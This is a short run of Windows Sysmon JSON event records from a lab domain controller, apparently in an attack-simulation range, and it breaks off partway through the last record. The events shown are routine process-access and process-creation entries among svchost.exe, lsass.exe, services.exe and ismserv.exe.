{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 908\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"908","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.364\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.364","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.368\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nProcessId: 2516\r\nImage: C:\\Windows\\System32\\ismserv.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Intersite Messaging Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ismserv.exe\r\nCommandLine: C:\\Windows\\System32\\ismserv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.368","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001071C70200}","Image":"C:\\Windows\\System32\\ismserv.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Intersite Messaging Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"ismserv.exe","CommandLine":"C:\\Windows\\System32\\ismserv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001071C70200}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001071C70200}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1220,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.372\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 